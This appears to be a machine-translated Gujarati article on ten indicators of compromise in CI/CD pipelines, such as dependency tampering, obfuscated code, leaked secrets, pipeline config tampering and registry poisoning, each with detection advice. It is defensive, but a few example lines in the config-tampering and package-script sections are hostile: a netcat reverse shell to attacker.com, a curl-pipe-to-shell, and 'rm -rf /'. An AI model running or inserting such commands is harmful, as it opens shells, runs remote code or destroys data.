પરિચય: સાયબર સુરક્ષામાં સમાધાનના સૂચકો શું છે?
સમાધાનના સૂચકો એ પ્રથમ ચેતવણી સંકેતો છે કે તમારી સિસ્ટમ અથવા pipeline હુમલા હેઠળ હોઈ શકે છે. સરળ શબ્દોમાં કહીએ તો, સમાધાનના સૂચકાંકો હુમલાખોરો દ્વારા છોડી દેવામાં આવેલા નિશાનો છે, જેમ કે વિચિત્ર logins, ફાઇલ ફેરફારો, અથવા છુપાયેલા માલવેર. માં IOC સાયબર સુરક્ષા, તેઓ ગુનાના સ્થળે ફિંગરપ્રિન્ટ્સ જેવું કાર્ય કરે છે, જે તમને સ્પષ્ટ પુરાવા આપે છે કે કંઈક ખોટું છે. તેથી, જ્યારે વિકાસકર્તાઓ પૂછે છે સમાધાનના સંકેતો શું છે?, જવાબ ફક્ત સર્વર અથવા ફાયરવોલ પૂરતો મર્યાદિત નથી, તેમાં આધુનિકમાં છુપાયેલા જોખમો પણ શામેલ છે CI/CD pipelines.
આમાં pipelines, હુમલાખોરો કોડ સાથે ચેડા કરી શકે છે, દૂષિત નિર્ભરતા દાખલ કરી શકે છે, અથવા ધ્યાન આપ્યા વિના બિલ્ડ સ્ટેપ્સ બદલી શકે છે. જો કે, મોટાભાગના માર્ગદર્શિકાઓ હજુ પણ ફક્ત સર્વર્સ અથવા નેટવર્ક્સ પર ધ્યાન કેન્દ્રિત કરે છે. પરિણામે, સોફ્ટવેર સપ્લાય ચેઇન સૌથી સરળ લક્ષ્યોમાંનું એક બની ગયું છે.
એટલા માટે સમાધાનના સૂચકો શોધવા CI/CD pipelines જરૂરી છે. સૌથી ઉપર, તે ટીમોને માલવેરને અવરોધિત કરવામાં, રહસ્યોનું રક્ષણ કરવામાં અને સોફ્ટવેર ડિલિવરીના દરેક પગલાને સુરક્ષિત કરવામાં મદદ કરે છે.
સમાધાનના ટોચના 10 સૂચકાંકો CI/CD Pipelines
સમાધાનના સૂચકાંકો સમજાવતી વખતે, મોટાભાગની યાદીઓ સર્વર અથવા નેટવર્ક પર ધ્યાન કેન્દ્રિત કરે છે. છતાં CI/CD pipelineહુમલાખોરો ખૂબ જ અલગ અલગ ફિંગરપ્રિન્ટ્સ છોડી દે છે. સક્રિય સંરક્ષણ માટે આ સંકેતોને ઓળખવા ખૂબ જ મહત્વપૂર્ણ છે. નીચે 10 IOC સાયબર સુરક્ષા લાલ ધ્વજ છે જેના પર દરેક ડેવલપર અને સુરક્ષા એન્જિનિયરે ધ્યાન રાખવું જોઈએ.
૧. શંકાસ્પદ નિર્ભરતા ફેરફારો
સમાધાનના મુખ્ય સૂચકોમાંનું એક pipelines એ અચાનક, વિચિત્ર ડિપેન્ડન્સી અપડેટ છે. હુમલાખોરો ઘણીવાર ખતરનાક પેકેજો ઉમેરવા માટે પેકેજ મેનેજરોમાં ડેવલપર્સના વિશ્વાસનો ઉપયોગ કરે છે.
ઉદાહરણ તરીકે, npm a માં package.json અચાનક તફાવતમાં શામેલ હોઈ શકે છે:
આવા ફેરફારો સલામત લાગે છે પરંતુ દરેક બિલ્ડમાં ટ્રોજનાઇઝ્ડ કોડ દાખલ કરી શકે છે.
અસર: ચેડા થયેલા બિલ્ડ્સ સ્ત્રોત પર માલવેર વારસામાં મેળવે છે.
શોધ: ડિપેન્ડન્સી સમીક્ષાઓ લાગુ કરો, લોકફાઇલ ડિફરન્સ ટ્રેક કરો અને નવા પેકેજો હંમેશા સ્કેન કરો.
2. બિલ્ડ્સમાં અસ્પષ્ટ કોડ
માલવેર લેખકો સમીક્ષાઓને બાયપાસ કરવા માટે અસ્પષ્ટતા પર આધાર રાખે છે. પરિણામે, સમાધાનનો આ સૂચક CI/CD pipelines ને પકડવું સૌથી મુશ્કેલ હોઈ શકે છે. હકીકતમાં, અસ્પષ્ટ પેલોડ્સ ઘણીવાર સૂચના વિના ઓપન સોર્સ લાઇબ્રેરીઓ અથવા કન્ટેનર છબીઓમાં સરકી જાય છે.
દાખ્લા તરીકે:
- નો ઉપયોગ કરીને એક PyPI પેકેજ
base64.b64decode("cHJpbnQoSGFja2VkKQ=="). - બિન-જરૂરી UPX બાઈનરીઓથી ભરેલી ડોકર છબી.
- જાવાસ્ક્રિપ્ટ ભરેલું છે
\x41\x42ઓળખપત્ર ચોરોને છુપાવીને ભાગી જાય છે.
અસર: હિડન કોડ બિલ્ડ અથવા રનટાઇમ દરમિયાન શાંતિથી એક્ઝિક્યુટ થાય છે, જે તેને IOC સાયબર સુરક્ષામાં એક મહત્વપૂર્ણ સંકેત બનાવે છે.
શોધ: ભેગું કરો SAST એન્કોડેડ અથવા પેક્ડ કોડને ફ્લેગ કરવા માટે માલવેર સ્કેનિંગ સાથે. સૌથી ઉપર, અસ્પષ્ટતાને એક લાલ ધ્વજ તરીકે ગણો જે વધુ તપાસને પાત્ર છે.
૩. ગિટમાં ખુલેલા રહસ્યો: એક ક્લાસિક IOC સાયબર સુરક્ષા જોખમ
CI/CD pipelineઘણીવાર ભંડારોમાંથી સીધા રહસ્યો વારસામાં મળે છે. જોકે, જ્યારે ગિટમાં રહસ્યો દેખાય છે, તેઓ "સમાધાનના સૂચકાંકો શું છે" પ્રશ્નના સૌથી સ્પષ્ટ જવાબોમાંનો એક બની જાય છે pipeline"શું?" એકવાર ઓળખપત્રો Git માં આવી જાય, પછી હુમલાખોરો તેમનો અનિશ્ચિત સમય માટે ઉપયોગ કરી શકે છે.
દાખ્લા તરીકે:
- A
.envફાઇલ ધરાવે છેAWS_SECRET_KEY=. - ટોકન્સ અંદર ધકેલી દેવામાં આવ્યા
config.json. - દૂર કર્યા પછી પણ ગિટ ઇતિહાસમાં રહસ્યો હજુ પણ દેખાય છે.
અસર: ખુલ્લી ચાવીઓ હુમલાખોરોને સીધી ઍક્સેસ આપે છે CI/CD pipelines, ક્લાઉડ સિસ્ટમ્સ અથવા ડેટાબેઝ. તેથી, આ સમાધાનના સૌથી ખતરનાક સૂચકોમાંનું એક છે.
શોધ: વાપરવુ pre-commit hooks અને ગુપ્ત સ્કેનિંગ માટે CI જોબ્સ, અને લીક થયેલી કી તાત્કાલિક રદ કરો. વધુમાં, એક્સપોઝર વિન્ડોઝ ઘટાડવા માટે ઓટોમેટેડ રિમેડિયેશન લાગુ કરો.
૪. છેડછાડ Pipeline રૂપરેખાંકનો: સમાધાનના છુપાયેલા સૂચકાંકો
Pipeline રૂપરેખાઓ ઉચ્ચ-મૂલ્ય લક્ષ્યો છે કારણ કે એક જ ફેરફાર ઘણીવાર સમગ્ર કાર્યપ્રણાલીને હાઇજેક કરે છે. પરિણામે, ચેડાં કરવામાં આવ્યા pipeline ફાઇલો એ IOC સાયબર સુરક્ષા માટેનું એક મોટું જોખમ છે જે પરંપરાગત દેખરેખ સાધનો ભાગ્યે જ શોધી કાઢે છે.
દાખ્લા તરીકે:
GitHub ક્રિયાઓમાં:
- ગિટલેબમાં: એક દૂષિત જોબ ઉમેરવામાં આવી
.gitlab-ci.ymlજે સંવેદનશીલ ડેટા ડમ્પ કરે છે. - જેનકિન્સમાં:
sh "nc -e /bin/bash attacker.com 4444".
અસર: આ બિન-મંજૂર ફેરફારો તમારા pipeline હુમલાખોરો માટે કાયમી પાછલા દરવાજામાં ફેરવાઈ જવું, જે સ્પષ્ટપણે સમાધાનના સૂચક તરીકે ગણાય છે.
શોધ: સહી કરેલ રૂપરેખાંકનો લાગુ કરો, PR મંજૂરીઓની જરૂર કરો અને અણધાર્યા કાર્યો માટે દેખરેખ રાખો. વધુમાં, સેટ કરો guardrails જે બદલાયેલા વર્કફ્લોને આપમેળે અવરોધિત કરે છે.
૪. વિશેષાધિકૃત IaC મૂળભૂત
ખોટી રીતે ગોઠવેલી ઇન્ફ્રાસ્ટ્રક્ચર વ્યાખ્યાઓ ઘણીવાર છુપાયેલા બેકડોર્સ બનાવે છે. પરિણામે, વિશેષાધિકૃત ડિફોલ્ટ્સ IaC એક ક્લાસિક IOC સાયબર સુરક્ષા જોખમ છે.
દાખ્લા તરીકે:
- કુબર્નેટ્સ ડિપ્લોયમેન્ટ ગ્રાન્ટિંગ પોડ્સ
privileged: true. - હેલ્મ ચાર્ટ્સ સેવાઓનો ખુલાસો કરે છે
0.0.0.0:22.
અસર: હુમલાખોરો રૂટ-લેવલ ઍક્સેસ મેળવે છે અથવા આંતરિક સેવાઓને જાહેરમાં ખુલ્લી પાડે છે. પરિણામે, આ મુદ્દાઓ હુમલાની સપાટીને નોંધપાત્ર રીતે વિસ્તૃત કરે છે.
શોધ: લાગુ પડે છે IaC મર્જ કરતા પહેલા ઓછામાં ઓછા વિશેષાધિકાર લાગુ કરવા માટે સ્કેનિંગ. વધુમાં, ખાતરી કરો કે દરેક રૂપરેખાંકનની સમીક્ષા ભાગ રૂપે કરવામાં આવે છે pipeline.
6. અસામાન્ય બાંધા વર્તન
હુમલાખોરો ઘણીવાર બદલાતા રહે છે pipeline દૂષિત ક્રિયાઓમાં લપસી પડવાની વર્તણૂક. બીજા શબ્દોમાં કહીએ તો, અસામાન્ય બાંધકામ પ્રવૃત્તિ એ સમાધાનના સૂચકો શું છે તેના સ્પષ્ટ જવાબોમાંનો એક છે CI/CD pipelines.
દાખ્લા તરીકે:
- વિચિત્ર ડોમેન્સમાં આઉટબાઉન્ડ નેટવર્ક વિનંતીઓ કરવા માટે બિલ્ડ્સ.
- એક Node.js પ્રોજેક્ટ અચાનક PowerShell ને જન્મ આપે છે
npm install. - બિલ્ડ સ્ક્રિપ્ટોમાં વ્યાખ્યાયિત ન હોય તેવા મોટા બાઈનરી ડાઉનલોડ કરવાનું CI કાર્ય.
અસર: ચેડા થયેલા બિલ્ડ્સ માલવેર વિતરણ બિંદુઓ તરીકે કાર્ય કરી શકે છે. સૌથી ઉપર, તેઓ દરેક ડિપ્લોયમેન્ટમાં દૂષિત પેલોડ્સ ફેલાવે છે.
શોધ: અણધારી પ્રક્રિયાઓ અથવા કનેક્શન્સ માટે બિલ્ડ લોગનું નિરીક્ષણ કરો. વધુમાં, ધોરણની બહારના વર્તણૂકોને ચિહ્નિત કરવા માટે વિસંગતતા શોધને ગોઠવો.
7. IOC સાયબર સુરક્ષા જોખમો તરીકે દૂષિત પેકેજ સ્ક્રિપ્ટો
પેકેજ મેનેજરો જીવનચક્રને ટેકો આપે છે hooks જેનો હુમલાખોરો ઉપયોગ કરે છે. તેથી, npm, PyPI, અથવા Dockerfiles માં દૂષિત સ્ક્રિપ્ટો સમાધાનના મજબૂત સૂચક છે.
દાખ્લા તરીકે:
- npm:
postinstallસ્ક્રિપ્ટ ચાલી રહી છેrm -rf /અથવા C2 પર બીકનિંગ. - પીઆઈપીઆઈ:
setup.pyઇન્સ્ટોલ કરતી વખતે છુપાયેલા પાયથોન કોડનો અમલ. - ડોકરફાઈલ:
RUN curl attacker.sh | sh.
અસર: આ હુમલો ઇન્સ્ટોલેશન દરમિયાન, કોઈપણ રનટાઇમ પરીક્ષણ પહેલાં થાય છે. પરિણામે, વિકાસકર્તાઓ ક્યારેય ધ્યાન નહીં આપે ત્યાં સુધી ખૂબ મોડું થઈ જાય.
શોધ: ઇન્સ્ટોલ સ્ક્રિપ્ટો માટે સ્કેન પેકેજ મેનિફેસ્ટ. વધુમાં, જોખમી પ્રતિબંધિત કરો hooks in CI/CD એક્સપોઝર ઘટાડવા માટે નોકરીઓ.
8. સમાધાનના રજિસ્ટ્રી ઝેરના સૂચકો
હુમલાખોરો રજિસ્ટ્રીમાં કલાકૃતિઓને બદલી નાખે છે અથવા તેમાં ફેરફાર કરે છે, અને આ ઘટનાઓ પુરવઠા શૃંખલામાં સમાધાનના સૂચકોના પાઠ્યપુસ્તક ઉદાહરણો છે. pipelines.
દાખ્લા તરીકે:
- ડોકર ઇમેજ ટેગને ટ્રોજનાઇઝ્ડ લેયર સાથે શાંતિથી અપડેટ કરવામાં આવ્યો.
- એક આંતરિક પેકેજને ઝેરી સંસ્કરણથી બદલવામાં આવ્યું.
- npm નેમસ્પેસ સ્ક્વોટિંગ, જેમ કે
lodash-proxy.
અસર: રજિસ્ટ્રી આર્ટિફેક્ટનો ઉપયોગ કરતી દરેક બિલ્ડ સાથે ચેડા થાય છે. એટલું જ નહીં, પરંતુ આ ચેડા ડાઉનસ્ટ્રીમ સેવાઓમાં પણ ફેલાય છે.
શોધ: બધા રજિસ્ટ્રી પુલ્સ પર સહી અને અખંડિતતા તપાસ લાગુ કરો. વધુમાં, આર્ટિફેક્ટ મૂળને ટ્રૅક કરો SBOM માન્યતા
9. IOC પુરાવા તરીકે અસામાન્ય વપરાશકર્તા પ્રવૃત્તિ
ચેડા થયેલા ખાતાઓ લગભગ હંમેશા અસામાન્ય નિશાન છોડી જાય છે. તદનુસાર, અસામાન્ય વિકાસકર્તા વર્તન સમાધાનનું મજબૂત સૂચક છે.
દાખ્લા તરીકે:
- Commitસ્થાનિક સમય મુજબ સવારે 3 વાગ્યે દબાણ કરવામાં આવ્યું.
- વેકેશન પર ખાતાઓ દ્વારા પીઆર મંજૂરીઓ.
- Pipelineઅસામાન્ય આવર્તન સાથે ટ્રિગર થાય છે.
અસર: હુમલાખોરો દૂષિત ફેરફારો દાખલ કરવા માટે ચોરાયેલા ઓળખપત્રોનો દુરુપયોગ કરે છે. છેવટે, અનધિકૃત commitસામાન્ય કાર્યપ્રવાહમાં સરળતાથી ભળી જાય છે.
શોધ: મોનિટર SCM વિસંગતતાઓ માટે પ્રવૃત્તિ, MFA લાગુ કરો અને નિયમિતપણે ટોકન્સ ફેરવો. વધુમાં, શંકાસ્પદ પર ચેતવણી આપો commit અથવા મંજૂરી પેટર્ન.
૧૦. IOC સાયબર સુરક્ષામાં નિષ્ફળ અખંડિતતા અથવા સહી તપાસ
એક સામાન્ય પણ અવગણવામાં આવેલ સમાધાનનું સૂચક એક નિષ્ફળ અખંડિતતા અથવા સહી તપાસ છે. IOC સાયબર સુરક્ષામાં, આ તપાસો ચકાસે છે કે કોડ અથવા કલાકૃતિઓ અધિકૃત છે. તેમને છોડી દેવાથી pipelineખુલ્લું પડી ગયું છે.
ઉદાહરણો:
- અપેક્ષિત ચેકસમ સાથે મેળ ખાતો નથી તે SHA256 હેશ.
- ગુમ થયેલ અથવા અમાન્ય GPG સહી.
- An SBOM સહી ન કરેલી કલાકૃતિઓ બતાવી રહ્યું છે.
અસર: અખંડિતતા નિષ્ફળતાઓનો અર્થ ઘણીવાર ચેડાં, રજિસ્ટ્રી પોઈઝનિંગ અથવા માલવેર ઈન્જેક્શન થાય છે.
શોધ: સહી તપાસને સ્વચાલિત કરો, ચેકસમ માન્યતા લાગુ કરો અને સહી ન કરેલા ઘટકોને અવરોધિત કરો. સૌથી ઉપર, દરેક નિષ્ફળ તપાસને સમાધાનના સ્પષ્ટ પુરાવા તરીકે ગણો.
CI/CD એક નજરમાં સમાધાનના સૂચકાંકો
| સમાધાન સૂચક (IOC) | માં અસર CI/CD Pipelines | કેવી રીતે શોધવું |
|---|---|---|
| શંકાસ્પદ નિર્ભરતા ફેરફારો | હુમલાખોરો પેકેજ મેનેજરોમાં દૂષિત લાઇબ્રેરીઓ દાખલ કરે છે, જેના કારણે બિલ્ડ્સ બગડે છે. | લોકફાઇલ ડિફર્સ ટ્રૅક કરો, ડિપેન્ડન્સી સમીક્ષાઓ લાગુ કરો અને ડિપેન્ડન્સીને સતત સ્કેન કરો. |
| બિલ્ડ્સમાં અસ્પષ્ટ કોડ | છુપાયેલા પેલોડ્સ બિલ્ડ્સ અથવા રનટાઇમ દરમિયાન શોધ વિના એક્ઝિક્યુટ થાય છે. | વાપરવુ SAST અને base64, હેક્સ, અથવા પેક્ડ કોડ પેટર્નને ફ્લેગ કરવા માટે માલવેર સ્કેનિંગ. |
| ગિટમાં ખુલ્લા રહસ્યો | લીક થયેલા ટોકન્સ અથવા API કી હુમલાખોરોને મહત્વપૂર્ણ સિસ્ટમ્સ સુધી સીધી ઍક્સેસ આપે છે. | ગિટમાં ગુપ્ત સ્કેન ચલાવો hooks અને લીક થયેલા ઓળખપત્રોને આપમેળે રદ કરી શકાય છે. |
| ચેડાં કર્યાં Pipeline રૂપરેખાંકનો | સંશોધિત વર્કફ્લો ડેટા એક્સફિલ્ટ્રેશન અથવા અંદર સ્થાયી થવા દે છે CI/CD. | પીઆર મંજૂરીઓની જરૂર છે, સહી કરેલ રૂપરેખાંકનો લાગુ કરો અને મોનિટર કરો pipeline ફેરફારો |
| વિશેષાધિકૃત IaC મૂળભૂત | વધુ પડતી પરવાનગી આપતી ભૂમિકાઓ અથવા અસુરક્ષિત ડિફોલ્ટ્સ ક્લાઉડ વાતાવરણને ઉજાગર કરે છે. | ઓછામાં ઓછા વિશેષાધિકાર અમલીકરણ માટે ટેરાફોર્મ, કુબર્નેટ્સ અને હેલ્મ ફાઇલો સ્કેન કરો. |
| અસામાન્ય બિલ્ડ વર્તણૂકો | Pipelines નો ઉપયોગ માલવેર વિતરણ બિંદુઓ તરીકે અથવા બાજુની ગતિ માટે થાય છે. | અણધાર્યા ડાઉનલોડ્સ, પ્રક્રિયાઓ અથવા આઉટબાઉન્ડ કોલ્સ માટે બિલ્ડ લોગનું વિશ્લેષણ કરો. |
| દૂષિત પેકેજ સ્ક્રિપ્ટો | રનટાઇમ પરીક્ષણ પહેલાં છુપાયેલી પ્રી/પોસ્ટ-ઇન્સ્ટોલ સ્ક્રિપ્ટ્સ પેલોડ્સને ટ્રિગર કરે છે. | જોખમી npm/PyPI સ્ક્રિપ્ટોને અવરોધિત કરો અને અમલીકરણને પ્રતિબંધિત કરો CI/CD નોકરીઓ |
| રજિસ્ટ્રી પોઇઝનિંગ | ટ્રોજનાઇઝ્ડ આર્ટિફેક્ટ્સ રજિસ્ટ્રીમાં વિશ્વસનીય છબીઓ અથવા બાયનરીઓને બદલે છે. | ચેકસમ ચકાસો, સહી માન્યતા લાગુ કરો અને રજિસ્ટ્રીઓને સક્રિય રીતે સ્કેન કરો. |
| અસામાન્ય વપરાશકર્તા પ્રવૃત્તિ | ચેડા થયેલા એકાઉન્ટ્સ દૂષિતતાને આગળ ધપાવે છે commits અથવા ટ્રિગર pipelines. | MFA લાગુ કરો, મોનિટર કરો commitવિસંગતતાઓ માટે s, અને વિશ્લેષણ કરો login પેટર્ન. |
| નિષ્ફળ પ્રામાણિકતા અથવા સહી તપાસ | ચેડા કરેલા કોડ, નિર્ભરતાઓ અથવા છબીઓ દાખલ થાય છે તે સૂચવે છે pipeline. | સ્વચાલિત અખંડિતતા તપાસો અને સહી ન કરેલા અથવા મેળ ન ખાતા ઘટકોને અવરોધિત કરો. |
પરંપરાગત IOC સાયબર સુરક્ષા કેમ ચૂકી જાય છે CI/CD જોખમો
મોટાભાગની સંસ્થાઓ પહેલાથી જ સર્વર, કમ્પ્યુટર અથવા નેટવર્ક પર સમાધાનના સૂચકાંકોનું નિરીક્ષણ કરે છે. જો કે, IOC સાયબર સુરક્ષા માટેનો આ ક્લાસિક અભિગમ અવગણે છે CI/CD pipelines, જે હવે સૌથી મહત્વપૂર્ણ હુમલાની સપાટીઓમાંની એક છે. હકીકતમાં, pipelines અનન્ય સમાધાન સંકેતો દર્શાવે છે જે પરંપરાગત સાધનો શોધી શકતા નથી.
પરંપરાગત સુરક્ષામાં સમાધાનના સૂચકાંકો
પરંપરાગત IOC સાયબર સુરક્ષામાં, સામાન્ય રીતે આના પર ધ્યાન કેન્દ્રિત કરવામાં આવે છે:
- અસામાન્ય logins અથવા IP સરનામાં જે ચોરાયેલા ઓળખપત્રો સૂચવે છે.
- શંકાસ્પદ ફાઇલ હેશ અથવા રજિસ્ટ્રી ફેરફારો જે માલવેરને છતી કરે છે.
- ડેટા એક્સફિલ્ટ્રેશન તરફ નિર્દેશ કરતો અણધાર્યો આઉટબાઉન્ડ ટ્રાફિક.
આ જાણીતા સૂચકાંકો છે જે MITER ATT&CK ફ્રેમવર્ક, જે સામાન્ય પ્રતિસ્પર્ધી વર્તણૂકો અને યુક્તિઓનો નકશો બનાવે છે. આ ઉપયોગી સંકેતો છે. જો કે, તે મુખ્યત્વે ઓપરેટિંગ સિસ્ટમ્સ અથવા કોર્પોરેટ નેટવર્ક્સ પર લાગુ પડે છે. પરિણામે, તેઓ સોફ્ટવેર સપ્લાય ચેઇનમાં અગાઉ થતી સૂક્ષ્મ ચેડાંને ચૂકી જાય છે.
શા માટે CI/CD Pipelineઅલગ છે
CI/CD pipelines એ સ્વયંસંચાલિત વાતાવરણ છે જ્યાં વિકાસકર્તાઓ commit કોડ, પુલ ડિપેન્ડન્સી અને રિલીઝ બિલ્ડ્સ. હુમલાખોરો જાણે છે કે અહીં એક સમાધાન દરેક ડિપ્લોયમેન્ટમાં કેસ્કેડ થાય છે. તે મુજબ, સમાધાનના સૂચકો શું છે CI/CD pipelineતેઓ ખૂબ જ અલગ દેખાય છે:
- package.json અથવા requirements.txt માં એક દૂષિત નિર્ભરતા ચૂપચાપ ઉમેરવામાં આવી.
- Git માં API કી અથવા ટોકન્સ ખુલ્લા છે commits અથવા .env ફાઇલો.
- npm અથવા PyPI પેકેજોમાં ઇન્જેક્ટ કરેલ અસ્પષ્ટ કોડ.
- ટેરાફોર્મ અથવા કુબર્નેટ્સ ફાઇલો જેમાં અસુરક્ષિત ડિફોલ્ટ્સ જેમ કે વિશેષાધિકૃત: સાચું હોય છે.
- Pipeline ડેટા એક્સફિલ્ટ્રેટ કરવા અથવા બેકડોર ખોલવા માટે સંપાદિત કાર્યો.
આ સમાધાન સંકેતો CI/CD અદ્રશ્ય રહેવું standard સુરક્ષા સાધનો.
IOC સાયબર સુરક્ષામાં અંતર
ઘણી ટીમો સમાધાનના સૂચકાંકોનું મૂલ્ય સમજે છે, તેમ છતાં તેઓ હજુ પણ ફક્ત સર્વર્સ અને નેટવર્ક લોગમાંથી શોધ પર આધાર રાખે છે. તેથી, હુમલાખોરો સામાન્ય નિશાન છોડ્યા વિના બિલ્ડ્સને ઝેર આપી શકે છે અથવા માલવેર દાખલ કરી શકે છે. આ જ કારણ છે કે XZ Utils બેકડોર અથવા દૂષિત npm પેકેજો જેવી ઘટનાઓ ઉત્પાદન સુધી પહોંચે ત્યાં સુધી શોધી શકાતી નથી.
આ પ્રકારના સપ્લાય ચેઇન સમાધાનો પણ પ્રકાશિત થાય છે CISA નું સપ્લાય ચેઇન સુરક્ષા માર્ગદર્શન, જે ચેતવણી આપે છે કે હુમલાખોરો વધુને વધુ લક્ષ્ય બનાવી રહ્યા છે CI/CD pipelines અને રજિસ્ટ્રીઝ.
Takeaway
પરંપરાગત IOC સાયબર સુરક્ષા જરૂરી છે પણ પૂરતી નથી. સૌથી ઉપર, ટીમોએ ચોક્કસ સમાધાનના સૂચકોને ઓળખવા જોઈએ CI/CD pipelines. તો જ તેઓ દૂષિત કોડ શોધી શકે છે અથવા pipeline દુરુપયોગ પર્યાવરણમાં ફેલાય તે પહેલાં તેને દૂર કરો.





